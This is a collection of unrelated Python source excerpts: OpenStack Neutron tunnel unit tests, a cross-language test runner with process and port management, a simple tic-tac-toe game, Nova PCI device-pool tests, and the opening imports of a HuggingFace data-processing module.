self.ovs_bridges[self.INT_BRIDGE].check_canary_table.return_value = \
constants.OVS_NORMAL
with mock.patch.object(log.KeywordArgumentAdapter,
'exception') as log_exception,\
mock.patch.object(self.mod_agent.OVSNeutronAgent,
'scan_ports') as scan_ports,\
mock.patch.object(
self.mod_agent.OVSNeutronAgent,
'process_network_ports') as process_network_ports,\
mock.patch.object(self.mod_agent.OVSNeutronAgent,
'tunnel_sync'),\
mock.patch.object(time, 'sleep'),\
mock.patch.object(self.mod_agent.OVSNeutronAgent,
'update_stale_ofport_rules') as update_stale:
log_exception.side_effect = Exception(
'Fake exception to get out of the loop')
scan_ports.side_effect = [reply2, reply3]
process_network_ports.side_effect = [
False, Exception('Fake exception to get out of the loop')]
q_agent = self._build_agent()
# Hack to test loop
# We start method and expect it will raise after 2nd loop
# If something goes wrong, assert_has_calls below will catch it
try:
q_agent.daemon_loop()
except Exception:
pass
# FIXME(salv-orlando): There should not be assertions on log
# messages
log_exception.assert_called_once_with(
"Error while processing VIF ports")
scan_ports.assert_has_calls([
mock.call(set(), set()),
mock.call(set(['tap0']), set())
])
process_network_ports.assert_has_calls([
mock.call({'current': set(['tap0']),
'removed': set([]),
'added': set(['tap2'])}, False),
mock.call({'current': set(['tap2']),
'removed': set(['tap0']),
'added': set([])}, False)
])
self.assertTrue(update_stale.called)
self._verify_mock_calls()
class TunnelTestOFCtl(TunnelTest, ovs_test_base.OVSOFCtlTestBase):
pass
class TunnelTestUseVethInterco(TunnelTest):
USE_VETH_INTERCONNECTION = True
def _define_expected_calls(self, arp_responder=False):
self.mock_int_bridge_cls_expected = [
mock.call(self.INT_BRIDGE),
]
self.mock_phys_bridge_cls_expected = [
mock.call(self.MAP_TUN_BRIDGE),
]
self.mock_tun_bridge_cls_expected = [
mock.call(self.TUN_BRIDGE),
]
self.mock_int_bridge_expected = [
mock.call.create(),
mock.call.set_secure_mode(),
mock.call.setup_controllers(mock.ANY),
mock.call.delete_port('patch-tun'),
mock.call.setup_default_table(),
]
self.mock_map_tun_bridge_expected = [
mock.call.setup_controllers(mock.ANY),
mock.call.setup_default_table(),
mock.call.delete_port('phy-%s' % self.MAP_TUN_BRIDGE),
mock.call.add_port(self.intb),
]
self.mock_int_bridge_expected += [
mock.call.delete_port('int-%s' % self.MAP_TUN_BRIDGE),
mock.call.add_port(self.inta)
]
self.mock_int_bridge_expected += [
mock.call.drop_port(in_port=self.MAP_TUN_INT_OFPORT),
]
self.mock_map_tun_bridge_expected += [
mock.call.drop_port(in_port=self.MAP_TUN_PHY_OFPORT),
]
self.mock_tun_bridge_expected = [
mock.call.reset_bridge(secure_mode=True),
mock.call.setup_controllers(mock.ANY),
mock.call.add_patch_port('patch-int', 'patch-tun'),
]
self.mock_int_bridge_expected += [
mock.call.add_patch_port('patch-tun', 'patch-int')
]
self.mock_int_bridge_expected += [
mock.call.get_vif_ports(),
mock.call.db_list('Port', columns=['name', 'other_config', 'tag'])
]
self.mock_tun_bridge_expected += [
mock.call.delete_flows(),
mock.call.setup_default_table(self.INT_OFPORT, arp_responder),
]
self.device_exists_expected = [
mock.call('int-%s' % self.MAP_TUN_BRIDGE),
]
self.ipdevice_expected = [
mock.call('int-%s' % self.MAP_TUN_BRIDGE),
mock.call().link.delete()
]
self.ipwrapper_expected = [
mock.call(),
mock.call().add_veth('int-%s' % self.MAP_TUN_BRIDGE,
'phy-%s' % self.MAP_TUN_BRIDGE)
]
self.get_bridges_expected = [mock.call(), mock.call()]
self.inta_expected = [mock.call.link.set_up()]
self.intb_expected = [mock.call.link.set_up()]
self.execute_expected = [mock.call(['udevadm', 'settle',
'--timeout=10'])]
class TunnelTestUseVethIntercoOFCtl(TunnelTestUseVethInterco,
ovs_test_base.OVSOFCtlTestBase):
pass
class TunnelTestWithMTU(TunnelTestUseVethInterco):
VETH_MTU = 1500
def _define_expected_calls(self, arp_responder=False):
super(TunnelTestWithMTU, self)._define_expected_calls(arp_responder)
self.inta_expected.append(mock.call.link.set_mtu(self.VETH_MTU))
self.intb_expected.append(mock.call.link.set_mtu(self.VETH_MTU))
class TunnelTestWithMTUOFCtl(TunnelTestWithMTU,
ovs_test_base.OVSOFCtlTestBase):
pass
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import contextlib
import multiprocessing
import multiprocessing.managers
import os
import platform
import random
import signal
import socket
import subprocess
import sys
import threading
import time
from .compat import str_join
from .test import TestEntry, domain_socket_path
from .report import ExecReporter, SummaryReporter
RESULT_TIMEOUT = 128
RESULT_ERROR = 64
class ExecutionContext(object):
def __init__(self, cmd, cwd, env, report):
self._log = multiprocessing.get_logger()
self.report = report
self.cmd = cmd
self.cwd = cwd
self.env = env
self.timer = None
self.expired = False
self.killed = False
def _expire(self):
self._log.info('Timeout')
self.expired = True
self.kill()
def kill(self):
self._log.debug('Killing process : %d' % self.proc.pid)
self.killed = True
if platform.system() != 'Windows':
try:
os.killpg(self.proc.pid, signal.SIGKILL)
except Exception:
self._log.info('Failed to kill process group', exc_info=sys.exc_info())
try:
self.proc.kill()
except Exception:
self._log.info('Failed to kill process', exc_info=sys.exc_info())
def _popen_args(self):
args = {
'cwd': self.cwd,
'env': self.env,
'stdout': self.report.out,
'stderr': subprocess.STDOUT,
}
# make sure child processes doesn't remain after killing
if platform.system() == 'Windows':
DETACHED_PROCESS = 0x00000008
args.update(creationflags=DETACHED_PROCESS | subprocess.CREATE_NEW_PROCESS_GROUP)
else:
args.update(preexec_fn=os.setsid)
return args
def start(self, timeout=0):
joined = str_join(' ', self.cmd)
self._log.debug('COMMAND: %s', joined)
self._log.debug('WORKDIR: %s', self.cwd)
self._log.debug('LOGFILE: %s', self.report.logpath)
self.report.begin()
self.proc = subprocess.Popen(self.cmd, **self._popen_args())
if timeout > 0:
self.timer = threading.Timer(timeout, self._expire)
self.timer.start()
return self._scoped()
@contextlib.contextmanager
def _scoped(self):
yield self
self._log.debug('Killing scoped process')
if self.proc.poll() is None:
self.kill()
self.report.killed()
else:
self._log.debug('Process died unexpectedly')
self.report.died()
def wait(self):
self.proc.communicate()
if self.timer:
self.timer.cancel()
self.report.end(self.returncode)
@property
def returncode(self):
return self.proc.returncode if self.proc else None
def exec_context(port, logdir, test, prog):
report = ExecReporter(logdir, test, prog)
prog.build_command(port)
return ExecutionContext(prog.command, prog.workdir, prog.env, report)
def run_test(testdir, logdir, test_dict, max_retry, async=True):
try:
logger = multiprocessing.get_logger()
max_bind_retry = 3
retry_count = 0
bind_retry_count = 0
test = TestEntry(testdir, **test_dict)
while True:
if stop.is_set():
logger.debug('Skipping because shutting down')
return (retry_count, None)
logger.debug('Start')
with PortAllocator.alloc_port_scoped(ports, test.socket) as port:
logger.debug('Start with port %d' % port)
sv = exec_context(port, logdir, test, test.server)
cl = exec_context(port, logdir, test, test.client)
logger.debug('Starting server')
with sv.start():
if test.delay > 0:
logger.debug('Delaying client for %.2f seconds' % test.delay)
time.sleep(test.delay)
connect_retry_count = 0
max_connect_retry = 10
connect_retry_wait = 0.5
while True:
logger.debug('Starting client')
cl.start(test.timeout)
logger.debug('Waiting client')
cl.wait()
if not cl.report.maybe_false_positive() or connect_retry_count >= max_connect_retry:
if connect_retry_count > 0 and connect_retry_count < max_connect_retry:
logger.warn('[%s]: Connected after %d retry (%.2f sec each)' % (test.server.name, connect_retry_count, connect_retry_wait))
# Wait for 50ms to see if server does not die at the end.
time.sleep(0.05)
break
logger.debug('Server may not be ready, waiting %.2f second...' % connect_retry_wait)
time.sleep(connect_retry_wait)
connect_retry_count += 1
if sv.report.maybe_false_positive() and bind_retry_count < max_bind_retry:
logger.warn('[%s]: Detected socket bind failure, retrying...', test.server.name)
bind_retry_count += 1
else:
if cl.expired:
result = RESULT_TIMEOUT
elif not sv.killed and cl.proc.returncode == 0:
# Server should be alive at the end.
result = RESULT_ERROR
else:
result = cl.proc.returncode
if result == 0 or retry_count >= max_retry:
return (retry_count, result)
else:
logger.info('[%s-%s]: test failed, retrying...', test.server.name, test.client.name)
retry_count += 1
except (KeyboardInterrupt, SystemExit):
logger.info('Interrupted execution')
if not async:
raise
stop.set()
return None
except:
if not async:
raise
logger.warn('Error executing [%s]', test.name, exc_info=sys.exc_info())
return (retry_count, RESULT_ERROR)
class PortAllocator(object):
def __init__(self):
self._log = multiprocessing.get_logger()
self._lock = multiprocessing.Lock()
self._ports = set()
self._dom_ports = set()
self._last_alloc = 0
def _get_tcp_port(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 0))
port = sock.getsockname()[1]
self._lock.acquire()
try:
ok = port not in self._ports
if ok:
self._ports.add(port)
self._last_alloc = time.time()
finally:
self._lock.release()
sock.close()
return port if ok else self._get_tcp_port()
def _get_domain_port(self):
port = random.randint(1024, 65536)
self._lock.acquire()
try:
ok = port not in self._dom_ports
if ok:
self._dom_ports.add(port)
finally:
self._lock.release()
return port if ok else self._get_domain_port()
def alloc_port(self, socket_type):
if socket_type in ('domain', 'abstract'):
return self._get_domain_port()
else:
return self._get_tcp_port()
# static method for inter-process invokation
@staticmethod
@contextlib.contextmanager
def alloc_port_scoped(allocator, socket_type):
port = allocator.alloc_port(socket_type)
yield port
allocator.free_port(socket_type, port)
def free_port(self, socket_type, port):
self._log.debug('free_port')
self._lock.acquire()
try:
if socket_type == 'domain':
self._dom_ports.remove(port)
path = domain_socket_path(port)
if os.path.exists(path):
os.remove(path)
elif socket_type == 'abstract':
self._dom_ports.remove(port)
else:
self._ports.remove(port)
except IOError:
self._log.info('Error while freeing port', exc_info=sys.exc_info())
finally:
self._lock.release()
class NonAsyncResult(object):
def __init__(self, value):
self._value = value
def get(self, timeout=None):
return self._value
def wait(self, timeout=None):
pass
def ready(self):
return True
def successful(self):
return self._value == 0
class TestDispatcher(object):
def __init__(self, testdir, basedir, logdir_rel, concurrency):
self._log = multiprocessing.get_logger()
self.testdir = testdir
self._report = SummaryReporter(basedir, logdir_rel, concurrency > 1)
self.logdir = self._report.testdir
# seems needed for python 2.x to handle keyboard interrupt
self._stop = multiprocessing.Event()
self._async = concurrency > 1
if not self._async:
self._pool = None
global stop
global ports
stop = self._stop
ports = PortAllocator()
else:
self._m = multiprocessing.managers.BaseManager()
self._m.register('ports', PortAllocator)
self._m.start()
self._pool = multiprocessing.Pool(concurrency, self._pool_init, (self._m.address,))
self._log.debug(
'TestDispatcher started with %d concurrent jobs' % concurrency)
def _pool_init(self, address):
global stop
global m
global ports
stop = self._stop
m = multiprocessing.managers.BaseManager(address)
m.connect()
ports = m.ports()
def _dispatch_sync(self, test, cont, max_retry):
r = run_test(self.testdir, self.logdir, test, max_retry, False)
cont(r)
return NonAsyncResult(r)
def _dispatch_async(self, test, cont, max_retry):
self._log.debug('_dispatch_async')
return self._pool.apply_async(func=run_test, args=(self.testdir, self.logdir, test, max_retry), callback=cont)
def dispatch(self, test, max_retry):
index = self._report.add_test(test)
def cont(result):
if not self._stop.is_set():
retry_count, returncode = result
self._log.debug('freeing port')
self._log.debug('adding result')
self._report.add_result(index, returncode, returncode == RESULT_TIMEOUT, retry_count)
self._log.debug('finish continuation')
fn = self._dispatch_async if self._async else self._dispatch_sync
return fn(test, cont, max_retry)
def wait(self):
if self._async:
self._pool.close()
self._pool.join()
self._m.shutdown()
return self._report.end()
def terminate(self):
self._stop.set()
if self._async:
self._pool.terminate()
self._pool.join()
self._m.shutdown()
| |
"""
Hard-coded tic-tac-toe.
author: Jyler
date: 2018/01/06
Before starting reinforcement learning, where we can make a program learn
how to play tic-tac-toe itself, let's start by hard-coding the rules.
"""
import random
class tictactoeBoard():
def __init__(self):
self.boardState = {
1:" ",
2:" ",
3:" ",
4:" ",
5:" ",
6:" ",
7:" ",
8:" ",
9:" "
}
boardState = self.boardState
self.listX = []
self.listO = []
def getBoard(self):
boardState = self.boardState
print("-----" * 2 + "---") # | x | o | x |
print("| " + boardState[1] + " | " + boardState[2] + " | " + boardState[3] + " |")
print("-----" * 2 + "---")
print("| " + boardState[4] + " | " + boardState[5] + " | " + boardState[6] + " |")
print("-----" * 2 + "---")
print("| " + boardState[7] + " | " + boardState[8] + " | " + boardState[9] + " |")
print("-----" * 2 + "---")
def updateBoard(self,pos,new_values):
boardState = self.boardState
listX = self.listX
listO = self.listO
boardState[pos] = new_values
# Keep track of moves that have been made.
if new_values.lower() == 'x':
listX = listX.append(pos)
elif new_values.lower() == 'o':
listO = listO.append(pos)
else:
pass
pass
def checkBoard(self):
# Checks if someone has won or if it is a tie
boardState = self.boardState
# Check what positions have been played.
listX = self.listX
listO = self.listO
#print(listO,listX)
# check if someone has won
# 1 = 'o', 2 = 'x', False = no one
winBool = self.checkWin(listX, listO)
if winBool == 1:
print("O wins")
return True
elif winBool == 2:
print("X wins")
return True
else:
pass
# check if there is a tie
tieBool = self.checkTie(listX, listO)
if tieBool:
print("Tie.")
return True
else:
return False
def checkWin(self,listX,listO):
winStates = [
{1,2,3},{4,5,6},{7,8,9},{1,4,7},
{2,5,8},{3,6,9},{1,5,9},{3,5,7}
]
for winState in winStates:
#print("X: ",listX, " O: ",listO)
#print("winState: ",winState)
if (winState & set(listX)) == winState:
return 2 # 'x' wins
elif (winState & set(listO)) == winState:
return 1 # 'O' wins
else:
pass
return False
def checkTie(self,listX,listO):
combined = listX + listO
for i in range(1,10):
if i not in combined:
#print("no tie")
return False
else:
pass
#print("tie")
return True
def free(self):
listX = self.listX
listO = self.listO
combined = listX + listO
freeSpaces = [ space for space in range(1,10) if space not in combined ]
return freeSpaces
class playgame():
def __init__(self):
# randomize who goes first.
num = random.random()
if num >= 0.5:
human_first = True
print("You go first.")
else:
human_first = False
# User selects what 'piece' they want to use.
while True:
player_label = input("Choose x's or o's:\n")
if player_label.lower() in ['x','o']:
break
else:
print("Choose a correct label. ['x','o']")
machine_label = [i for i in ['x','o'] if i != player_label][0]
self.board = tictactoeBoard() # Initialize the board
board = self.board
board.getBoard()
#self.listStates = staticArray()
# Play until someone wins or there is a tie.
self.playGame(board, player_label, machine_label, human_first)
def human(self, board, label):
message = ("Type move position. Free positions are: " +
str(board.free()) + "\n")
player = int(input(message))
freePos = board.free()
while True:
if player in freePos:
break
else:
print("Are you trying to cheat?")
print("I'll let you choose again.")
player = int(input(message))
board.updateBoard(player,label)
board.getBoard()
if board.checkBoard():
return True
else:
pass
def reset(self):
self.winCont = []
self.tieCont = []
def machine(self, board, label):
currentBoard = dict(board.boardState)
#freePos = board.free()
if label == 'x':
currentTurn = 1 # so that the think function can check if a winState is for the machine or not
machine_label = 1 # This should actually be changed s.t., if I wanted, I could play the machine against itself.
elif label == 'o':
currentTurn = 0
machine_label = 0
self.reset()
self.storeBoardState = dict(board.boardState) # This is unnecessary.. I think
freeS = list([ i for i in currentBoard.keys() if currentBoard[i] not in ['x','o'] ])
self.think(currentBoard, currentTurn, 0, machine_label)
print("MACHINE DECI",self.winCont)
print("TIE: ",self.tieCont)
if len(self.winCont) != 0:
tempMoves = 100
for tup in self.winCont:
#print("tup", tup)
if tup[1] < tempMoves:
tempMoves = tup[1]
chooseMove = tup[0]
else:
pass
elif len(self.tieCont) != 0:
chooseMove = self.tieCont[0][0]
else:
freeS = self.board.free()
lengthFreeS = len(freeS)
idx = random.randint(0,lengthFreeS-1)
chooseMove = freeS[idx]
print("I know you've won.")
#print("DEBUG1", chooseMove, " moves I thought of: ", self.winCont, " tie cont: ",self.tieCont)
board.updateBoard(chooseMove, label)
board.getBoard()
if board.checkBoard():
return True
else:
pass
def playGame(self, board, player_label, machine_label, human_first):
if human_first:
while True:
#
hum_val = self.human(board,player_label)
if hum_val:
break
else:
pass
print("________________")
mach_val = self.machine(board,machine_label)
if mach_val:
break
else:
pass
else:
while True:
#
mach_val = self.machine(board,machine_label)
if mach_val:
break
else:
pass
hum_val = self.human(board,player_label)
if hum_val:
break
else:
pass
def think(self, board, turn, depth, machine_label):
# turn = either 0 or 1. 0 ='o', 1 = 'x'. Can cycle by using (x+1) mod 2
# board = the board state
boardState = dict(board)
freePos = list([ i for i in boardState.keys() if boardState[i] not in ['x','o'] ])
# If first move, choose anywhere.
if len(freePos) == 9:
posTemp = random.randint(1,9)
self.winCont.append((posTemp,2))
return 0
# Cycle which turn the machine is considering.
if turn == 0:
presentTurn = 'o'
elif turn == 1:
presentTurn = 'x'
winState = self.checkWin(boardState) # returns 2 if 'x' wins, 1 if 'o' wins, else False
tieState = self.checkTie(boardState) # return True if tie, else False
if (winState != False):#!= machine_label) and (winState != False): # Machine loses.
if int(not(turn)) != machine_label: # Is it a winState for the opponent?
if depth == 2:
temp1 = 5
else:
temp1 = 2
elif depth == 1: # Has only one move been played?
# print("HERERERERE!")
temp1 = 1
else:
temp1 = 0 # WinState
return temp1
elif tieState:
return 3
else:
pass
for pos in range(1,10):
if pos not in freePos:
continue
boardState = dict(board)
boardState[pos] = presentTurn
# recursive step
temp = self.think(boardState, ((turn+1)%2), depth+1, machine_label)
if temp == 0:
if depth == 0:
self.winCont.append((pos,3))
elif temp == 1:
if depth == 0:
self.winCont.append((pos,2))
elif temp == 2:
return 4
elif temp == 3:
if depth == 0:
self.tieCont.append((pos,1))
elif temp == 4:
freePos.remove(pos)
elif temp == 5:
return 6
elif temp == 6:
if depth == 0:
freePos.remove(pos)
else:
pass
return 0
def checkWin(self,boardState):
listX = [ i for i in boardState.keys() if boardState[i] == 'x' ]
listO = [ i for i in boardState.keys() if boardState[i] == 'o' ]
winStates = [
{1,2,3},{4,5,6},{7,8,9},{1,4,7},
{2,5,8},{3,6,9},{1,5,9},{3,5,7}
]
for winState in winStates:
if (winState & set(listX)) == winState:
return 2 # 'x' wins
elif (winState & set(listO)) == winState:
return 1 # 'O' wins
else:
pass
return False
def checkTie(self,boardState):
listX = [ i for i in boardState.keys() if boardState[i] == 'x' ]
listO = [ i for i in boardState.keys() if boardState[i] == 'o' ]
combined = listX + listO
for i in range(1,10):
if i not in combined:
#print("no tie")
return False
else:
pass
#print("tie")
return True
class staticArray():
def __init__(self):
self.reset()
def insert(self, place, data):
if place == 0:
self.loss.append(data)
elif place == 1:
self.win.append(data)
elif place == 2:
self.tie.append(data)
else:
pass
def reset(self):
self.loss = []
self.win = []
self.tie = []
def search(self, place):
lossList = self.loss
winList = self.win
tieList = self.tie
if place == 0:
for i in lossList:
if len(i) == 2:
return i
else:
pass
elif place == 1: # winlist
if len(winList) == 1:
return True
else:
False
def length(self, place):
if place == 0:
y = len(self.loss)
elif place == 1:
y = len(self.win)
elif place == 2:
y = len(self.tie)
else:
pass
return y
| |
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import exception
from nova import objects
from nova.pci import stats
from nova.pci import whitelist
from nova import test
from nova.tests.unit.pci import fakes
fake_pci_1 = {
'compute_node_id': 1,
'address': '0000:00:00.1',
'product_id': 'p1',
'vendor_id': 'v1',
'status': 'available',
'extra_k1': 'v1',
'request_id': None,
'numa_node': 0,
}
fake_pci_2 = dict(fake_pci_1, vendor_id='v2',
product_id='p2',
address='0000:00:00.2',
numa_node=1)
fake_pci_3 = dict(fake_pci_1, address='0000:00:00.3')
fake_pci_4 = dict(fake_pci_1, vendor_id='v3',
product_id='p3',
address='0000:00:00.3',
numa_node= None)
pci_requests = [objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': 'v1'}]),
objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': 'v2'}])]
pci_requests_multiple = [objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': 'v1'}]),
objects.InstancePCIRequest(count=3,
spec=[{'vendor_id': 'v2'}])]
class PciDeviceStatsTestCase(test.NoDBTestCase):
def _create_fake_devs(self):
self.fake_dev_1 = objects.PciDevice.create(fake_pci_1)
self.fake_dev_2 = objects.PciDevice.create(fake_pci_2)
self.fake_dev_3 = objects.PciDevice.create(fake_pci_3)
self.fake_dev_4 = objects.PciDevice.create(fake_pci_4)
map(self.pci_stats.add_device,
[self.fake_dev_1, self.fake_dev_2,
self.fake_dev_3, self.fake_dev_4])
def setUp(self):
super(PciDeviceStatsTestCase, self).setUp()
self.pci_stats = stats.PciDeviceStats()
# The following two calls need to be made before adding the devices.
patcher = fakes.fake_pci_whitelist()
self.addCleanup(patcher.stop)
self._create_fake_devs()
def test_add_device(self):
self.assertEqual(len(self.pci_stats.pools), 3)
self.assertEqual(set([d['vendor_id'] for d in self.pci_stats]),
set(['v1', 'v2', 'v3']))
self.assertEqual(set([d['count'] for d in self.pci_stats]),
set([1, 2]))
def test_remove_device(self):
self.pci_stats.remove_device(self.fake_dev_2)
self.assertEqual(len(self.pci_stats.pools), 2)
self.assertEqual(self.pci_stats.pools[0]['count'], 2)
self.assertEqual(self.pci_stats.pools[0]['vendor_id'], 'v1')
def test_remove_device_exception(self):
self.pci_stats.remove_device(self.fake_dev_2)
self.assertRaises(exception.PciDevicePoolEmpty,
self.pci_stats.remove_device,
self.fake_dev_2)
def test_object_create(self):
m = objects.pci_device_pool.from_pci_stats(self.pci_stats.pools)
new_stats = stats.PciDeviceStats(m)
self.assertEqual(len(new_stats.pools), 3)
self.assertEqual(set([d['count'] for d in new_stats]),
set([1, 2]))
self.assertEqual(set([d['vendor_id'] for d in new_stats]),
set(['v1', 'v2', 'v3']))
def test_support_requests(self):
self.assertEqual(self.pci_stats.support_requests(pci_requests),
True)
self.assertEqual(len(self.pci_stats.pools), 3)
self.assertEqual(set([d['count'] for d in self.pci_stats]),
set((1, 2)))
def test_support_requests_failed(self):
self.assertEqual(
self.pci_stats.support_requests(pci_requests_multiple), False)
self.assertEqual(len(self.pci_stats.pools), 3)
self.assertEqual(set([d['count'] for d in self.pci_stats]),
set([1, 2]))
def test_apply_requests(self):
self.pci_stats.apply_requests(pci_requests)
self.assertEqual(len(self.pci_stats.pools), 2)
self.assertEqual(self.pci_stats.pools[0]['vendor_id'], 'v1')
self.assertEqual(self.pci_stats.pools[0]['count'], 1)
def test_apply_requests_failed(self):
self.assertRaises(exception.PciDeviceRequestFailed,
self.pci_stats.apply_requests,
pci_requests_multiple)
def test_consume_requests(self):
devs = self.pci_stats.consume_requests(pci_requests)
self.assertEqual(2, len(devs))
self.assertEqual(set(['v1', 'v2']),
set([dev['vendor_id'] for dev in devs]))
def test_consume_requests_empty(self):
devs = self.pci_stats.consume_requests([])
self.assertEqual(0, len(devs))
def test_consume_requests_failed(self):
self.assertRaises(exception.PciDeviceRequestFailed,
self.pci_stats.consume_requests,
pci_requests_multiple)
def test_support_requests_numa(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0),
objects.NUMACell(id=1, cpuset=set(), memory=0)]
self.assertEqual(True, self.pci_stats.support_requests(
pci_requests, cells))
def test_support_requests_numa_failed(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0)]
self.assertEqual(False, self.pci_stats.support_requests(
pci_requests, cells))
def test_support_requests_no_numa_info(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0)]
pci_request = [objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': 'v3'}])]
self.assertEqual(True, self.pci_stats.support_requests(
pci_request, cells))
def test_consume_requests_numa(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0),
objects.NUMACell(id=1, cpuset=set(), memory=0)]
devs = self.pci_stats.consume_requests(pci_requests, cells)
self.assertEqual(2, len(devs))
self.assertEqual(set(['v1', 'v2']),
set([dev['vendor_id'] for dev in devs]))
def test_consume_requests_numa_failed(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0)]
self.assertRaises(exception.PciDeviceRequestFailed,
self.pci_stats.consume_requests,
pci_requests, cells)
def test_consume_requests_no_numa_info(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0)]
pci_request = [objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': 'v3'}])]
devs = self.pci_stats.consume_requests(pci_request, cells)
self.assertEqual(1, len(devs))
self.assertEqual(set(['v3']),
set([dev['vendor_id'] for dev in devs]))
@mock.patch.object(whitelist, 'get_pci_devices_filter')
class PciDeviceStatsWithTagsTestCase(test.NoDBTestCase):
def setUp(self):
super(PciDeviceStatsWithTagsTestCase, self).setUp()
self.pci_stats = stats.PciDeviceStats()
self._create_whitelist()
def _create_whitelist(self):
white_list = ['{"vendor_id":"1137","product_id":"0071",'
'"address":"*:0a:00.*","physical_network":"physnet1"}',
'{"vendor_id":"1137","product_id":"0072"}']
self.pci_wlist = whitelist.PciHostDevicesWhiteList(white_list)
def _create_pci_devices(self):
self.pci_tagged_devices = []
for dev in range(4):
pci_dev = {'compute_node_id': 1,
'address': '0000:0a:00.%d' % dev,
'vendor_id': '1137',
'product_id': '0071',
'status': 'available',
'request_id': None,
'numa_node': 0}
self.pci_tagged_devices.append(objects.PciDevice.create(pci_dev))
self.pci_untagged_devices = []
for dev in range(3):
pci_dev = {'compute_node_id': 1,
'address': '0000:0b:00.%d' % dev,
'vendor_id': '1137',
'product_id': '0072',
'status': 'available',
'request_id': None,
'numa_node': 0}
self.pci_untagged_devices.append(objects.PciDevice.create(pci_dev))
map(self.pci_stats.add_device, self.pci_tagged_devices)
map(self.pci_stats.add_device, self.pci_untagged_devices)
def _assertPoolContent(self, pool, vendor_id, product_id, count, **tags):
self.assertEqual(vendor_id, pool['vendor_id'])
self.assertEqual(product_id, pool['product_id'])
self.assertEqual(count, pool['count'])
if tags:
for k, v in tags.iteritems():
self.assertEqual(v, pool[k])
def _assertPools(self):
# Pools are ordered based on the number of keys. 'product_id',
# 'vendor_id' are always part of the keys. When tags are present,
# they are also part of the keys. In this test class, we have
# two pools with the second one having the tag 'physical_network'
# and the value 'physnet1'
self.assertEqual(2, len(self.pci_stats.pools))
self._assertPoolContent(self.pci_stats.pools[0], '1137', '0072',
len(self.pci_untagged_devices))
self.assertEqual(self.pci_untagged_devices,
self.pci_stats.pools[0]['devices'])
self._assertPoolContent(self.pci_stats.pools[1], '1137', '0071',
len(self.pci_tagged_devices),
physical_network='physnet1')
self.assertEqual(self.pci_tagged_devices,
self.pci_stats.pools[1]['devices'])
def test_add_devices(self, mock_get_dev_filter):
mock_get_dev_filter.return_value = self.pci_wlist
self._create_pci_devices()
self._assertPools()
def test_consume_reqeusts(self, mock_get_dev_filter):
mock_get_dev_filter.return_value = self.pci_wlist
self._create_pci_devices()
pci_requests = [objects.InstancePCIRequest(count=1,
spec=[{'physical_network': 'physnet1'}]),
objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': '1137',
'product_id': '0072'}])]
devs = self.pci_stats.consume_requests(pci_requests)
self.assertEqual(2, len(devs))
self.assertEqual(set(['0071', '0072']),
set([dev['product_id'] for dev in devs]))
self._assertPoolContent(self.pci_stats.pools[0], '1137', '0072', 2)
self._assertPoolContent(self.pci_stats.pools[1], '1137', '0071', 3,
physical_network='physnet1')
def test_add_device_no_devspec(self, mock_get_dev_filter):
mock_get_dev_filter.return_value = self.pci_wlist
self._create_pci_devices()
pci_dev = {'compute_node_id': 1,
'address': '0000:0c:00.1',
'vendor_id': '2345',
'product_id': '0172',
'status': 'available',
'request_id': None}
pci_dev_obj = objects.PciDevice.create(pci_dev)
self.pci_stats.add_device(pci_dev_obj)
# There should be no change
self.assertIsNone(
self.pci_stats._create_pool_keys_from_dev(pci_dev_obj))
self._assertPools()
def test_remove_device_no_devspec(self, mock_get_dev_filter):
mock_get_dev_filter.return_value = self.pci_wlist
self._create_pci_devices()
pci_dev = {'compute_node_id': 1,
'address': '0000:0c:00.1',
'vendor_id': '2345',
'product_id': '0172',
'status': 'available',
'request_id': None}
pci_dev_obj = objects.PciDevice.create(pci_dev)
self.pci_stats.remove_device(pci_dev_obj)
# There should be no change
self.assertIsNone(
self.pci_stats._create_pool_keys_from_dev(pci_dev_obj))
self._assertPools()
def test_remove_device(self, mock_get_dev_filter):
mock_get_dev_filter.return_value = self.pci_wlist
self._create_pci_devices()
dev1 = self.pci_untagged_devices.pop()
self.pci_stats.remove_device(dev1)
dev2 = self.pci_tagged_devices.pop()
self.pci_stats.remove_device(dev2)
self._assertPools()
| |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from dataclasses import dataclass
from typing import List, Optional, Union
import tqdm
from filelock import FileLock
from transformers import (
BartTokenizer,
BartTokenizerFast,
DataProcessor,
PreTrainedTokenizer,
RobertaTokenizer,
RobertaTokenizerFast,
XLMRobertaTokenizer,
is_tf_available,
is_torch_available,
)
